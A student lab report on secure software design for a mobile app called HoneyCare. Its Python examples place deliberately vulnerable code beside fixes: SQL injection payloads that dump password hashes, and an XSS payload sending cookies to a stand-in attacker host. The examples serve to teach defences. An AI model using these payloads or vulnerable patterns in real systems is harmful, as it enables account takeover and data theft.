
PANGASINAN STATE UNIVERSITY BS COMPUTER ENGINEERING

CpE116 Software Design Laboratory Report No. 10

LABORATORY REPORT NO. 10

Designing Secure Software Systems

OVERVIEW

The objective of this laboratory activity is to explore the principles and techniques for
designing secure software systems. Security is a critical aspect of software design, as it
ensures the protection of sensitive data, prevents unauthorized access, and mitigates
potential security vulnerabilities. In this lab, we will delve into the key considerations, best
practices, and design patterns for building secure software systems, with a focus on
ensuring confidentiality, integrity, and availability.

OBJECTIVES

• Understand the importance of designing secure software systems.
• Explore the principles and techniques for designing secure software architectures.
• Gain practical experience in applying security practices to software designs.
• Analyze the impact of secure design decisions on software security and reliability.

ABSTRACT

Ensuring the security of software systems is a critical concern in today's digital
landscape. Secure system design is important, but security must also be considered during
implementation, since programming errors introduce vulnerabilities that attackers can
exploit. Assessing a system's security is nevertheless a hard task. Security testing,
verification, and validation should evaluate the system's ability to resist various types
of attack, yet such assessments are difficult because of the nature of security
requirements and the ingenuity of intelligent attackers.

Security testing poses two fundamental challenges. First, security requirements are
usually negative: they state what should not happen. Testing can only show the presence of
specific vulnerabilities, never their absence, so it is practically impossible to
demonstrate that a system is free of them. Second, attackers actively search for
vulnerabilities, experimenting with the system and exploiting assumptions the developers
made. They use automated tools to analyze systems over long periods and continually
discover new attack vectors.




Several approaches are employed to assess and ensure the security of software
systems. Experience-based testing validates the system against known types of attack,
either by developing test cases for them or by examining the source code for the
corresponding weaknesses. Penetration testing engages external experts to simulate attacks
and attempt to breach the system. Tool-based analysis relies on security tools, such as
password checkers or static analysis tools, to identify vulnerabilities. Formal
verification, although less commonly used, aims to mathematically prove that a system
conforms to its security requirements.

Given the time constraints of testing, a risk-based approach is often adopted,
focusing on the most significant risks identified through risk analysis. Testing then not
only verifies that the system meets its security requirements but also probes for
vulnerabilities through attack vectors the requirements did not anticipate.

Overall, ensuring software system security requires a combination of approaches,
expertise, and ongoing vigilance. Security practices should be integrated throughout the
software development lifecycle, and measures should be regularly updated to address
emerging vulnerabilities. By understanding the challenges involved and implementing
comprehensive security measures, software systems can better withstand evolving threats.

DISCUSSION

Ensuring a high level of security in software projects is critical to protecting user
data, maintaining system integrity, and preventing unauthorized access and malicious
activity. In this review we examine the current design of the HoneyCare app in detail to
uncover security weaknesses. By identifying and addressing these weaknesses we can
strengthen the project's overall security posture and limit the associated risks.

Analysis of Design for Security Vulnerabilities:

1. User Authentication and Access:
- The HoneyCare app authenticates a user before granting access: it asks for a
username and password and checks them against its stored records. It then applies
authorization based on the user's role (regular user or administrator), which
determines what the user is allowed to see and which actions the user can take.




2. Protection of Personal Data:
- The HoneyCare app protects personal information by encrypting sensitive data so
that it is unreadable to unauthorized people. It also has measures in place for
responding to a breach, so that the exposure of user information is contained if one
does occur.

3. Secure Communication:
- The HoneyCare app protects the privacy of the messages a user sends: data in
transit is encrypted to prevent interception or tampering, and the app verifies the
identity of the servers it connects to so that it does not communicate with impostors.

4. Input Validation and Content Safety:
- The HoneyCare app validates the input a user provides, rejecting malformed or
malicious input before it can cause harm. It also ensures that the content displayed
to users does not carry hidden malicious code, protecting them from attacks embedded
in other users' content.

5. Session Security:
- The HoneyCare app protects a user's session while the app is in use. It implements
measures against session hijacking and unauthorized monitoring of the user's
activity, and ensures that no one else can use the session without authorization.

6. Error Handling and Logging:
- When something goes wrong, the HoneyCare app handles the error securely while
safeguarding user information: error messages do not reveal sensitive details that
could aid an attacker. The app also keeps a record of system activity through logs and
promptly notifies the relevant team of any security issue.




7. Third-Party Dependencies:
- The HoneyCare app relies on external libraries and services to function, but it does
not trust them blindly. It evaluates the security of these dependencies to ensure they
do not compromise user safety, and it keeps them up to date so that known
vulnerabilities are addressed.

8. Security Assessment:
- The HoneyCare app's security is assessed regularly to identify and address potential
weaknesses. Skilled professionals conduct penetration testing, actively searching for
vulnerabilities, and the code undergoes thorough review to detect hidden security risks.

In this section we analyze the project's design to identify potential security
vulnerabilities and propose targeted design modifications that mitigate these risks.
Resolving these vulnerabilities and adopting resilient security practices strengthens the
project's overall security posture while safeguarding user data and preserving system
integrity.

Potential security risks and proposed design changes to mitigate them.

1. Risk: Weak Passwords

- Potential Risk: Users might choose weak passwords that are easy to guess, leaving
their accounts vulnerable to unauthorized access through guessing or credential
stuffing.
- Proposed Design Change: Enforce a password policy at registration and password
change: a minimum length (at least 8 characters, with longer passphrases encouraged),
rejection of passwords found in lists of commonly used or previously breached
passwords, and rejection of passwords that contain the username. Composition rules
alone (letters plus numbers plus special characters) add little, because users satisfy
them in predictable ways such as "Password1!", so they should not be the only check.
Registration should also explain to users why weak passwords put their account at
risk.
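The following is an added example of such a policy check, written for this report and not taken from the HoneyCare code base; the minimum length of 12 and the small deny-list are assumptions standing in for a real breached-password corpus. It also keeps the classic composition rule alongside, to show that a password can satisfy it and still be rejected by the deny-list, while a long passphrase with no digits or symbols is accepted.

```python
from __future__ import annotations

# Added example (not HoneyCare's code). The threshold and the deny-list
# below are assumptions; a real deployment would use a large breached-
# password corpus rather than a hand-written set.
MIN_LENGTH = 12

# Constructed stand-in for a list of commonly used / breached passwords.
COMMON_PASSWORDS = {
    "password", "password1", "password1!", "p@ssw0rd", "p@ssw0rd!",
    "qwerty123", "letmein", "welcome1", "honeycare2024", "123456789012",
}


def meets_composition_rules(password: str) -> bool:
    """The classic 'letters + digits + symbols' rule, shown here only to
    demonstrate that it accepts passwords the deny-list rejects."""
    return (any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password)
            and any(not c.isalnum() for c in password))


def password_problems(password: str, username: str) -> list[str]:
    """Return the policy violations for a candidate password.

    An empty list means the password is accepted. Checks are ordered so the
    user sees the cheapest fix (length) first.
    """
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    # Case-fold before the lookup so 'P@ssw0rd!' and 'p@ssw0rd!' both match.
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears in a list of common or breached passwords")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    # Catch 'aaaaaaaaaaaa'-style padding that passes the length check.
    if len(set(password)) <= 2:
        problems.append("uses too few distinct characters")
    return problems


if __name__ == "__main__":
    for candidate in ("P@ssw0rd!", "correct horse battery staple", "alice-honeycare-2024"):
        print(candidate, "->", password_problems(candidate, "alice") or "accepted",
              "| composition rule:", meets_composition_rules(candidate))
```

Returning a list of reasons rather than a bare boolean lets the registration form tell the user exactly what to change, which is the educational step the proposed design change asks for.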

2. Risk: SQL Injection Attacks

- Potential Risk: If user input is concatenated into SQL statements, attackers can
inject SQL of their own, bypassing authentication, reading or modifying data, or
dumping the database.
- Proposed Design Change: Use parameterized queries (prepared statements) for all
database interactions, so that the SQL text is fixed and user input reaches the
database only as data; this is the control that removes the injection vector. Input
validation (type, length, allowed characters) remains valuable as defense in depth,
but it is not a substitute: "sanitizing" strings by escaping quotes is error-prone and
should not be relied on. The database account the application uses should also hold
only the privileges it needs, which limits the damage if an injection is found anyway.
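The following added example (written for this report, not HoneyCare's code) puts a deliberately vulnerable lookup beside the parameterized version against an in-memory SQLite table with constructed rows. The table and column names are assumptions. Two payloads are run through both: a tautology that makes the vulnerable query return every user, and a UNION that makes it leak the password hashes; the parameterized query returns nothing for either, because the payload is compared as a literal username.

```python
import sqlite3

# Added example, not HoneyCare's code. Table layout and rows are constructed.


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database standing in for the app's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "user"), ("bob", "hash-b", "user"), ("admin", "hash-c", "admin")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Deliberately vulnerable: the input becomes part of the SQL text, so the
    # database cannot tell the developer's query from the attacker's addition.
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    # Parameterized: the statement is fixed and the value travels separately,
    # so quotes, OR and UNION inside it are just characters in a string.
    query = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def demo() -> dict:
    conn = make_db()
    tautology = "' OR '1'='1"                                      # returns every row
    dump = "x' UNION SELECT username, password_hash FROM users --"  # leaks the hashes
    return {
        "normal": lookup_safe(conn, "alice"),
        "tautology_vulnerable": lookup_vulnerable(conn, tautology),
        "tautology_safe": lookup_safe(conn, tautology),
        "dump_vulnerable": lookup_vulnerable(conn, dump),
        "dump_safe": lookup_safe(conn, dump),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:22} {rows}")
```

The point of the UNION payload is that the damage is not limited to the query's own table columns: whatever the application's database account can read, an injection can read.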

3. Risk: Cross-Site Scripting (XSS) Attacks

- Potential Risk: If user-supplied content is placed into web pages without proper
encoding, attackers can inject scripts that run in other users' browsers, hijacking
their sessions or stealing sensitive information.
- Proposed Design Change: Encode all user-generated content for the context in which
it is rendered (HTML body, HTML attribute, JavaScript, URL) at the point of output,
preferably through a templating engine that escapes by default so that a forgotten
call is not possible. Sanitization (stripping tags) is needed only where users may
submit rich text. A Content Security Policy and HttpOnly session cookies limit the
damage of any script that does get through. Web frameworks and libraries must also be
kept updated and patched, so that known weaknesses in their escaping or template code
do not undermine these controls.
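As an added example for this report (not HoneyCare's code), the block below renders a user comment two ways: by concatenation, and with encoding chosen per context. The HTML fragments are assumptions about how a comment and a profile link might be laid out. The payloads show two different breakouts: a script tag in the comment body, and a quote in the author name that would add an event handler to the attribute; the encoded version turns both into inert text.

```python
import html
from urllib.parse import quote

# Added example, not HoneyCare's code. The HTML fragments are assumptions about
# how a comment and a profile link might be rendered.


def render_comment_vulnerable(author: str, text: str) -> str:
    # Deliberately vulnerable: user content is concatenated straight into HTML,
    # so '<script>' in the text and a stray '"' in the author become markup.
    return f'<div class="comment" data-author="{author}"><p>{text}</p></div>'


def render_comment_safe(author: str, text: str) -> str:
    # HTML-body context: html.escape neutralises < > &.
    # Attribute context: quote=True also turns " and ' into entities, so the
    # author cannot break out of data-author="..." to add an event handler.
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(text)}</p></div>')


def profile_link_safe(user_id: str) -> str:
    # URL context: percent-encode first so the value cannot change the path,
    # then HTML-escape because the URL sits inside an attribute.
    href = "/users/" + quote(user_id, safe="")
    return f'<a href="{html.escape(href, quote=True)}">profile</a>'


def contains_live_script(fragment: str) -> bool:
    """Crude oracle for the demo: an unescaped <script tag or a '" onmouseover=' breakout."""
    low = fragment.lower()
    return "<script" in low or '" onmouseover=' in low


if __name__ == "__main__":
    author = 'mallory" onmouseover="alert(1)'
    text = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
    print("vulnerable:", render_comment_vulnerable(author, text))
    print("safe:      ", render_comment_safe(author, text))
    print("link:      ", profile_link_safe("../admin?x=1"))
```

Note that the same value needs different encoding depending on where it lands; applying HTML escaping to a URL path segment, for example, would not stop `../` from changing the route. That is why the proposed design change talks about context, not about a single sanitizer.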

4. Risk: Insecure Session Management

- Potential Risk: Weak session management can lead to session hijacking or session
fixation attacks, enabling unauthorized individuals to take over user accounts.
- Proposed Design Change: Generate session identifiers server-side from a
cryptographically secure random source so that they cannot be guessed; transmit them in
cookies marked Secure, HttpOnly and SameSite; issue a fresh identifier at login (which
defeats fixation, since any identifier planted before authentication becomes
worthless); enforce both idle and absolute session expiration; and invalidate the
session on the server at logout rather than merely clearing the cookie. Multi-factor
authentication adds a further layer of protection for the accounts themselves.
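The following added example (written for this report, not HoneyCare's code) is a minimal in-memory session store that applies those rules. The timeouts, the store layout and the cookie attributes are assumptions; the clock is injectable so that expiry can be exercised without waiting. The fixation scenario is the interesting path: an identifier obtained before login is discarded at login, so an attacker who planted it gains nothing.

```python
from __future__ import annotations

import secrets
import time
from dataclasses import dataclass

# Added example, not HoneyCare's code. Timeouts and store layout are assumptions.
IDLE_TTL = 15 * 60        # seconds of inactivity before a session dies
ABSOLUTE_TTL = 8 * 3600   # hard cap on a session's lifetime, active or not


@dataclass
class Session:
    user: str | None      # None = anonymous (pre-login)
    created: float
    last_seen: float


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions: dict[str, Session] = {}

    @staticmethod
    def _new_id() -> str:
        # 32 bytes (256 bits) from the OS CSPRNG: not derived from the user
        # name, the time or a counter, so it cannot be predicted or enumerated.
        return secrets.token_urlsafe(32)

    def start_anonymous(self) -> str:
        sid = self._new_id()
        now = self._clock()
        self._sessions[sid] = Session(None, now, now)
        return sid

    def login(self, presented_sid: str | None, user: str) -> str:
        # Regenerate on privilege change: whatever ID the browser arrived with
        # (possibly planted by an attacker, i.e. session fixation) is discarded.
        if presented_sid:
            self._sessions.pop(presented_sid, None)
        sid = self._new_id()
        now = self._clock()
        self._sessions[sid] = Session(user, now, now)
        return sid

    def user_for(self, sid: str) -> str | None:
        """Resolve a session ID to a user, enforcing idle and absolute expiry."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s.last_seen > IDLE_TTL or now - s.created > ABSOLUTE_TTL:
            del self._sessions[sid]          # expired: remove it server-side
            return None
        s.last_seen = now
        return s.user

    def logout(self, sid: str) -> None:
        # Invalidate server-side; clearing the cookie alone leaves the ID usable.
        self._sessions.pop(sid, None)


def cookie_header(sid: str) -> str:
    # Secure keeps the ID off plaintext HTTP, HttpOnly keeps it away from page
    # scripts (limiting XSS to the page, not the account), SameSite keeps it
    # out of cross-site requests.
    return f"Set-Cookie: session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    store = SessionStore()
    planted = store.start_anonymous()
    sid = store.login(planted, "alice")
    print("planted ID still valid after login?", store.user_for(planted) is not None)
    print(cookie_header(sid))
```

In a real deployment the store would be a database or cache shared by all application instances, but the invariants are the same: random IDs, regeneration at login, server-side invalidation, and expiry enforced where the lookup happens.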

5. Risk: Insufficient Logging and Monitoring

- Potential Risk: Inadequate logging and monitoring make it difficult to detect and
respond to security incidents, such as unauthorized access attempts or suspicious
activity, and leave no evidence for later investigation.
- Proposed Design Change: Log security-relevant events: successful and failed logins,
password and role changes, access to sensitive records, and input rejected by
validation, each with a timestamp, the acting account, the source address and the
outcome. Never write passwords, session tokens or other secrets into the logs. Feed the
logs to a monitoring system that alerts administrators on patterns such as bursts of
failed logins against one account or from one address, so that they can investigate
and respond promptly.
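As an added example for this report (not HoneyCare's code), the block below runs a simple detector over constructed authentication log lines. The log format, the threshold of five failures within sixty seconds, and the sample lines are all assumptions. Besides counting failures per account and per source address, it flags a success that follows a burst of failures, which is the pattern a successful password-guessing attack leaves behind and the event an on-call team most needs to see.

```python
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timezone

# Added example, not HoneyCare's code. Log format, thresholds and the sample
# lines are constructed assumptions.
THRESHOLD = 5   # this many failures ...
WINDOW = 60     # ... inside this many seconds raises an alert

# Constructed sample: one address guessing alice's password, then succeeding,
# plus ordinary traffic from bob. Note what is logged (who, from where, outcome,
# reason) and what is not (the passwords that were tried).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth ok user=bob ip=203.0.113.7
2024-05-01T10:00:05Z auth fail user=alice ip=198.51.100.9 reason=bad_password
2024-05-01T10:00:09Z auth fail user=alice ip=198.51.100.9 reason=bad_password
2024-05-01T10:00:14Z auth fail user=alice ip=198.51.100.9 reason=bad_password
2024-05-01T10:00:20Z auth fail user=alice ip=198.51.100.9 reason=bad_password
2024-05-01T10:00:31Z auth fail user=alice ip=198.51.100.9 reason=bad_password
2024-05-01T10:00:40Z auth ok user=alice ip=198.51.100.9
2024-05-01T10:05:00Z auth fail user=bob ip=203.0.113.7 reason=bad_password
"""


def parse(line: str) -> dict:
    """Turn one log line into {'ts': epoch seconds, 'outcome': ..., 'user': ..., 'ip': ...}."""
    ts, _event, outcome, *fields = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    record = {"ts": when.timestamp(), "outcome": outcome}
    record.update(f.split("=", 1) for f in fields)
    return record


def detect(lines) -> list[str]:
    """Sliding-window failed-login detector keyed by account and by source address."""
    recent: dict[str, deque] = defaultdict(deque)   # key -> timestamps of recent failures
    alerted: set[str] = set()
    alerts: list[str] = []
    for line in lines:
        if not line.strip():
            continue
        rec = parse(line)
        for key in (f"user={rec['user']}", f"ip={rec['ip']}"):
            q = recent[key]
            while q and rec["ts"] - q[0] > WINDOW:      # forget failures outside the window
                q.popleft()
            if rec["outcome"] == "fail":
                q.append(rec["ts"])
                if len(q) >= THRESHOLD and key not in alerted:
                    alerted.add(key)
                    alerts.append(f"{key}: {len(q)} failed logins within {WINDOW}s")
            elif len(q) >= THRESHOLD:
                # A success right after a burst of failures is the signature of a
                # guessing attack that worked: escalate rather than just count.
                alerts.append(f"{key}: successful login after {len(q)} recent failures")
                q.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print("ALERT", alert)
```

Keying on both the account and the source address matters: a spray across many accounts from one address never trips a per-account threshold, and a distributed attack on one account never trips a per-address one.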




6. Risk: Insecure Data Storage

- Potential Risk: Storing sensitive user information insecurely, in plain text or under
weak or home-grown encryption, turns a database compromise into a data breach and a
loss of user privacy.
- Proposed Design Change: Encrypt sensitive data at rest with a well-reviewed
authenticated cipher such as AES-GCM, and keep the keys separate from the data (in a
key management service or hardware module, never in the source code or in the same
database). Passwords are a special case: they should never be encrypted, only stored as
salted hashes produced by a deliberately slow algorithm (bcrypt, scrypt, Argon2 or
PBKDF2), so that a leaked table cannot be cracked cheaply. Access controls on the
database and file system, following least privilege, further prevent unauthorized
access.
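The following added example (written for this report, not HoneyCare's code) shows the password-storage half of that change with the Python standard library: a salted PBKDF2-HMAC-SHA256 record, constant-time verification, and a check that lets old records be upgraded on the user's next login when the iteration count is raised. The record format is an assumption; the iteration count follows the OWASP Password Storage Cheat Sheet's 2023 figure for PBKDF2-HMAC-SHA256.

```python
import base64
import hashlib
import hmac
import secrets

# Added example, not HoneyCare's code. The record format is an assumption; the
# iteration count follows the OWASP Password Storage Cheat Sheet (2023) for
# PBKDF2-HMAC-SHA256.
ITERATIONS = 600_000
SALT_BYTES = 16


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest (base64)."""
    salt = secrets.token_bytes(SALT_BYTES)   # fresh per user: same password, different record
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return "$".join([
        "pbkdf2_sha256",
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and parameters; compare in constant time."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
        salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
        iterations = int(iterations)
    except ValueError:
        return False   # malformed record (e.g. a legacy plaintext entry): never match
    if algo != "pbkdf2_sha256":
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations,
                                 dklen=len(expected))
    return hmac.compare_digest(actual, expected)   # no early-exit byte comparison


def needs_rehash(stored: str) -> bool:
    """True if the record predates the current policy (fewer iterations or another
    format), so it should be re-hashed on the user's next successful login."""
    parts = stored.split("$")
    return len(parts) != 4 or parts[0] != "pbkdf2_sha256" or int(parts[1]) < ITERATIONS


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("verify ok:", verify_password("correct horse battery staple", record))
    print("needs rehash:", needs_rehash(record))
```

Storing the parameters inside the record is what makes the policy upgradable: the verifier always uses the salt and iteration count the record was made with, and the application re-hashes with the current values once it has the plaintext in hand at login.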

7. Risk: Third-Party Vulnerabilities

- Potential Risk: Insecure or outdated third-party libraries and frameworks can
introduce vulnerabilities that attackers exploit, even when the application's own code
is sound.
- Proposed Design Change: Keep an inventory of all dependencies with pinned versions,
scan them automatically against vulnerability databases as part of the build, follow
the security advisories of the projects used, and apply patches promptly. Before
adopting a new component, review its security record and maintenance status, and
prefer libraries with few transitive dependencies so that the attack surface stays
small.

By implementing these design changes, the HoneyCare app can significantly reduce
potential security risks, enhancing overall security. These measures aim to protect user
data and ensure a safe and secure user experience.

Security enhancements and their impact on the system's design.


The security changes suggested for the HoneyCare app are intended to resolve the
weaknesses identified above and raise overall system security. Each has a concrete
effect on the app's design, delivering a safer user experience and protecting sensitive
data from the threats discussed. The enhancements and their impact on the design are:

1. Password Strength Policy:

- Enhancement: Implement a password policy that requires users to create strong
passwords.
- Impact on Design: Registration and password-change flows gain a validation step that
rejects short, common or breached passwords, making accounts harder to guess and adding
a layer of protection around sensitive information.

2. Input Validation and Parameterized Queries:

- Enhancement: Improve input validation and use parameterized queries for all database
interactions.
- Impact on Design: Parameterized queries remove the SQL injection vector by keeping
user input out of the SQL text, protecting the integrity and confidentiality of the
database; stricter input validation reduces the attack surface further by rejecting
malformed data before it reaches any interpreter. The data access layer must be written
so that string concatenation into queries is never used.

3. Output Encoding:

- Enhancement: Encode user-generated content on output to prevent cross-site scripting
(XSS) attacks.
- Impact on Design: Every place the app renders user-supplied content must pass it
through context-appropriate encoding, ideally via a template engine that escapes by
default, so that injected scripts are displayed as text rather than executed. This
protects users' sessions and accounts.

4. Secure Session Management:

- Enhancement: Implement secure session management, including cryptographically random
session identifiers, protective cookie attributes, and session expiration.
- Impact on Design: The app's authentication and authorization mechanisms are
strengthened: session identifiers become unguessable, are regenerated at login and
invalidated at logout, and expire after inactivity, preventing unauthorized use of a
user's session.

5. Comprehensive Logging and Monitoring:

- Enhancement: Enhance logging mechanisms and establish a robust monitoring system.
- Impact on Design: Comprehensive logging and monitoring give the app the ability to
record user activities, system events, and potential security incidents. Administrators
can then identify suspicious activity and respond promptly to mitigate risks.




6. Secure Data Storage:

- Enhancement: Strengthen data storage security with strong encryption algorithms, slow
password hashing, and secure storage practices.
- Impact on Design: Sensitive user data is protected at rest by strong encryption, with
keys managed separately from the data, and passwords are stored only as salted, slow
hashes. Secure storage practices and access controls further safeguard against
unauthorized access, reducing the risk of data breaches and protecting user privacy.

7. Regular Updating and Patching of Third-Party Dependencies:

- Enhancement: Keep third-party dependencies up to date by regularly updating and
patching them.
- Impact on Design: By staying current with security patches and fixes, the app
minimizes the risk that known vulnerabilities in third-party libraries or frameworks
are exploited. Regular updates keep the environment more secure for the app and its
users.

By incorporating these security enhancements into the system's design, the HoneyCare
app can significantly improve its resilience against potential threats and protect user
data. These enhancements establish a stronger security foundation and provide users with
a safer and more secure experience while using the app.

CONCLUSION

In conclusion, when evaluating the security vulnerabilities in the current design of
the HoneyCare app, it is apparent that considerable attention has been given to
safeguarding user data and ensuring a secure user experience. The app incorporates
measures to verify user identities, encrypt sensitive information, and establish secure
channels for communication. It also emphasizes validating user input, maintaining
content integrity, securing user sessions, handling errors safely, and keeping
comprehensive logs.
Although the existing design is sound, there are opportunities for further
enhancement. Strengthening authentication with measures such as temporarily locking
accounts, or progressively slowing login attempts, after multiple failed logins provides
an additional layer of security against password guessing (slowing attempts rather than
locking avoids letting an attacker lock legitimate users out). It is also crucial that
robust encryption is employed and that encryption keys are managed securely, separately
from the data they protect, to maintain the confidentiality of user data.

To ensure secure communication, the app should continue using well-established
protocols and take precautions against attacks that could compromise data integrity or
confidentiality. Thorough input validation, together with parameterized queries and
output encoding, protects against common vulnerabilities such as injection of malicious
code or scripts. Improving session management and refining error handling will further
strengthen the app's ability to safeguard user sessions and protect sensitive
information.

The app's proactive approach to monitoring and updating third-party dependencies
demonstrates its commitment to addressing potential vulnerabilities. Regular security
assessments, including penetration tests to uncover hidden risks and careful code
reviews, play a pivotal role in maintaining a resilient system that can withstand
emerging threats.

By taking up these opportunities for improvement and implementing the recommended
design changes, the HoneyCare app can strengthen its security measures and provide
users with a high level of safety and peace of mind. A consistent commitment to user
privacy and data protection will foster trust among users and support the app's
reputation as a reliable and secure platform.

REFERENCES

Sommerville, I. (2016). Software Engineering, Global Edition (10th ed.). Pearson
Higher Education.

